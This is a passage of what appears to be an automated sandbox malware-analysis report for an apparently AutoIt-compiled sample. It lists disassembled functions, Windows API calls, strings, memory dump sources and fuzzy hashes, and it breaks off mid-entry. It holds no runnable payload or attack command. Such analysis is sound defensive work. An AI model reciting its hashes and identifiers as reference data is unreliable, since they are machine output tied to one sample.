                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CloseHandleHeap$FreeObjectProcessSingleWait
                                        • String ID:
                                        • API String ID: 3751786701-0
                                        • Opcode ID: 8f6fc1e4f9a31e97b87e04cd9cb187e35d870da9c5bcdd396bff6e9a74e9fcb3
                                        • Instruction ID: f6fb7602b89906ccef6407152ae8ed2f2a46ab68a82b4ff777b5f62a13e73014
                                        • Opcode Fuzzy Hash: 8f6fc1e4f9a31e97b87e04cd9cb187e35d870da9c5bcdd396bff6e9a74e9fcb3
                                        • Instruction Fuzzy Hash: 66E0E536004209FBDB215FE1EC0C90ABF79FF89722B108230F219C1870CB329468EB90
                                        Function 00EEC602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 00EEC69D
                                        • CoCreateInstance.COMBASE(00F12D6C,00000000,00000001,00F12BDC,?), ref: 00EEC6B5
                                          • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                                        • CoUninitialize.COMBASE ref: 00EEC922
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                        • String ID: .lnk
                                        • API String ID: 2683427295-24824748
                                        • Opcode ID: 640794d040a45c5c4bc78bc9a9ed9796c57b42fc077dca949bc6e36d32243610
                                        • Instruction ID: 3938a2af6d042d7c28c17b7536e3d51d7691d732eb31d60d022683c6b638ed11
                                        • Opcode Fuzzy Hash: 640794d040a45c5c4bc78bc9a9ed9796c57b42fc077dca949bc6e36d32243610
                                        • Instruction Fuzzy Hash: 63A14A71508205AFD304FF64C881EABB7E8FF94704F04595DF19AA71A2DB70EA49CB52
                                        Function 00E92E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00EA0FF6: std::exception::exception.LIBCMT ref: 00EA102C
                                          • Part of subcall function 00EA0FF6: __CxxThrowException@8.LIBCMT ref: 00EA1041
                                          • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                                          • Part of subcall function 00E87BB1: _memmove.LIBCMT ref: 00E87C0B
                                        • __swprintf.LIBCMT ref: 00E9302D
                                        Strings
                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00E92EC6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                        • API String ID: 1943609520-557222456
                                        • Opcode ID: ebf2e4b6c9d79327dc93a6fc082df9616dfd2603773c0afc12a58033cb4e9663
                                        • Instruction ID: 952340995fd7ecb3f133c2ae0d1adc7de5b7d7984de8d4ff0d3e80496a0a7d28
                                        • Opcode Fuzzy Hash: ebf2e4b6c9d79327dc93a6fc082df9616dfd2603773c0afc12a58033cb4e9663
                                        • Instruction Fuzzy Hash: 2D917B312083419FCB18EF24D985D6FB7E5EF85744F00295DF49AAB2A1DB20EE45CB52
                                        Function 00EEBBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E848A1,?,?,00E837C0,?), ref: 00E848CE
                                        • CoInitialize.OLE32(00000000), ref: 00EEBC26
                                        • CoCreateInstance.COMBASE(00F12D6C,00000000,00000001,00F12BDC,?), ref: 00EEBC3F
                                        • CoUninitialize.COMBASE ref: 00EEBC5C
                                          • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                                          • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                        • String ID: .lnk
                                        • API String ID: 2126378814-24824748
                                        • Opcode ID: fdae30aed92fa9177c88d287379be7287ccba0138c0e44852a1aced54018f511
                                        • Instruction ID: ea62b7a747adefd080700efc30f3c8f2f6c7d1a637f3b9e66b99f341b9013f79
                                        • Opcode Fuzzy Hash: fdae30aed92fa9177c88d287379be7287ccba0138c0e44852a1aced54018f511
                                        • Instruction Fuzzy Hash: ADA18A756043459FCB04EF15C884D6ABBE5FF88314F148988F89AAB3A2CB31ED45CB91
                                        Function 00EA524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                        Download Yara Rule
                                        APIs
                                        • __startOneArgErrorHandling.LIBCMT ref: 00EA52DD
                                          • Part of subcall function 00EB0340: __87except.LIBCMT ref: 00EB037B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ErrorHandling__87except__start
                                        • String ID: pow
                                        • API String ID: 2905807303-2276729525
                                        • Opcode ID: 10b0887f900c98ad1433c1186aeab491450e52123b475ca21143ebac0cfc7e38
                                        • Instruction ID: fcf8c71e94b4586a8eb55ff92ae448a0fe42e81f74abd32e64b17be3c653ce34
                                        • Opcode Fuzzy Hash: 10b0887f900c98ad1433c1186aeab491450e52123b475ca21143ebac0cfc7e38
                                        • Instruction Fuzzy Hash: 49518B22A0C70586CB107714CA413FF3BE09B56354F20AD68F4A5791E9EF74BCD8AA91
                                        Function 00EA023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: #$+
                                        • API String ID: 0-2552117581
                                        • Opcode ID: b529f073cf9d5e228346036efef7e7967aca974cb2fce1abc99c0e1ee6ce3164
                                        • Instruction ID: f7ba138527055dea61a1b253bcc0472d1b4d379bc4d159fea317940f9def3656
                                        • Opcode Fuzzy Hash: b529f073cf9d5e228346036efef7e7967aca974cb2fce1abc99c0e1ee6ce3164
                                        • Instruction Fuzzy Hash: 1A5111365052468FCF259F28C8886FA7BA6EF1A314F145056E895BF3A0D730AD47CB71
                                        Function 00E93297 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _memmove$_free
                                        • String ID: Oa
                                        • API String ID: 2620147621-3945284152
                                        • Opcode ID: 902291d88a8e9d252a3ee2327193b6d19eaaf65489e746d37c487fbc700a862d
                                        • Instruction ID: 88c617e50ff532999c69d870c7c92ed3d06b8f81025608f1649c033c151685a9
                                        • Opcode Fuzzy Hash: 902291d88a8e9d252a3ee2327193b6d19eaaf65489e746d37c487fbc700a862d
                                        • Instruction Fuzzy Hash: 3C514BB16083419FDB24CF68C441B6BBBE5FF89314F05592DE989A7361DB31E901CB52
                                        Function 00F07BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F0F910,00000000,?,?,?,?), ref: 00F07C4E
                                        • GetWindowLongW.USER32 ref: 00F07C6B
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F07C7B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$Long
                                        • String ID: SysTreeView32
                                        • API String ID: 847901565-1698111956
                                        • Opcode ID: 250ab69f7bf8b5945491fc457b43592828a96f4d24f835a6e2eae0b8135f3f7a
                                        • Instruction ID: 072eb4983c0f4394a49f8cd2614d61704f2a736a71e8e8687a7a645762a40cb6
                                        • Opcode Fuzzy Hash: 250ab69f7bf8b5945491fc457b43592828a96f4d24f835a6e2eae0b8135f3f7a
                                        • Instruction Fuzzy Hash: 45319231A04209ABDB21AF34CC41BEA77A9FB45334F248725F979A21E0D731EC51BB50
                                        Function 00F07648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F076D0
                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F076E4
                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F07708
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window
                                        • String ID: SysMonthCal32
                                        • API String ID: 2326795674-1439706946
                                        • Opcode ID: 80eb3aeffa55fca8550b1e00f2afac4df7d04687f0ff325a47b6e516688c0b4b
                                        • Instruction ID: 9b45d69bd92dbb712df6c96452851743f33b8d51c683e6ed1570904cf08905e7
                                        • Opcode Fuzzy Hash: 80eb3aeffa55fca8550b1e00f2afac4df7d04687f0ff325a47b6e516688c0b4b
                                        • Instruction Fuzzy Hash: CF21D332900218BBDF21DF54CC42FEA3BA9EF48724F110254FE156B1D0DAB1B851ABA0
                                        Function 00F06F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F06FAA
                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F06FBA
                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F06FDF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSend$MoveWindow
                                        • String ID: Listbox
                                        • API String ID: 3315199576-2633736733
                                        • Opcode ID: f0948d6a86b434bb94f160f281b68e3b0872c050f442c18e46076c2fdbbbe16c
                                        • Instruction ID: 0cdc6abc4bb2ff24dd3164b68f393097511397b93a56064f0b06b5b5156b4ccd
                                        • Opcode Fuzzy Hash: f0948d6a86b434bb94f160f281b68e3b0872c050f442c18e46076c2fdbbbe16c
                                        • Instruction Fuzzy Hash: B321C532A10119BFDF118F54DC85FAB37AAEF89765F018124F904DB1D0D6719C62A7A0
                                        Function 00F0797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F079E1
                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F079F6
                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F07A03
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: msctls_trackbar32
                                        • API String ID: 3850602802-1010561917
                                        • Opcode ID: 215b3c0b56621b34bd4be3726c24bf41b66ea355e1ff17ce20b75dbd0e934f8e
                                        • Instruction ID: c0a11547f449b975b3a67f83a2d261136194838d63a23f66b2630796aa90099b
                                        • Opcode Fuzzy Hash: 215b3c0b56621b34bd4be3726c24bf41b66ea355e1ff17ce20b75dbd0e934f8e
                                        • Instruction Fuzzy Hash: FB11E732A44208BAEF10AF60CC05F9B77A9EF89764F014519FA45A60E0D675E811EB60
                                        Function 00EFC304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00EC1D88,?), ref: 00EFC312
                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00EFC324
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                        • API String ID: 2574300362-1816364905
                                        • Opcode ID: 501b5a217fa0b23ff5cebc64d8ab917852c9dbaac741a459217b6b5648dc559b
                                        • Instruction ID: 097ec5add6bc67fd73d878e559b1e73d382a96752575199380f546d57e3706f6
                                        • Opcode Fuzzy Hash: 501b5a217fa0b23ff5cebc64d8ab917852c9dbaac741a459217b6b5648dc559b
                                        • Instruction Fuzzy Hash: 94E0C2B460131BCFCB344F25C804A9676D4FF4879CFA0D47AE985E2650E770D840DBA0
                                        Function 00E84C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00E84C2E), ref: 00E84CA3
                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E84CB5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                        • API String ID: 2574300362-192647395
                                        • Opcode ID: 0c0207db955199b77c6721cae29ceacf8bc8a3127ccddb67e5c57a9b6888dd3a
                                        • Instruction ID: c0058e251011197f457bbcd2d245a9b58f7941af9e8ee41d589aa5b6a86e7da7
                                        • Opcode Fuzzy Hash: 0c0207db955199b77c6721cae29ceacf8bc8a3127ccddb67e5c57a9b6888dd3a
                                        • Instruction Fuzzy Hash: 9CD012B0510727CFD730AF31DD18606B6D9BF05755B21883A9889D6990D674D484EB51
                                        Function 00E84D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00E84CE1,?), ref: 00E84DA2
                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E84DB4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                        • API String ID: 2574300362-1355242751
                                        • Opcode ID: 3f5afa4bc101afab34b08de5b13e5c07d1632991b09c76267dd6b3e419fb0789
                                        • Instruction ID: 7cd69325f3ac464a59579df4b7d290b78503bc8280cc8b851f957cac282a7c9b
                                        • Opcode Fuzzy Hash: 3f5afa4bc101afab34b08de5b13e5c07d1632991b09c76267dd6b3e419fb0789
                                        • Instruction Fuzzy Hash: 0FD017B1950717CFD730AF31D808A46B6E4FF09359B11883AD8CAE69D0E770D884EB51
                                        Function 00E84D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00E84D2E,?,00E84F4F,?,00F462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E84D6F
                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E84D81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                        • API String ID: 2574300362-3689287502
                                        • Opcode ID: f68fa8e8cc0981327092dce9de57241784a62c874bd083b2765e6f04fe09f986
                                        • Instruction ID: ad877013f3c286b039469b03f6f7f0c6dd3e624426580eaf0cea578e67d4c439
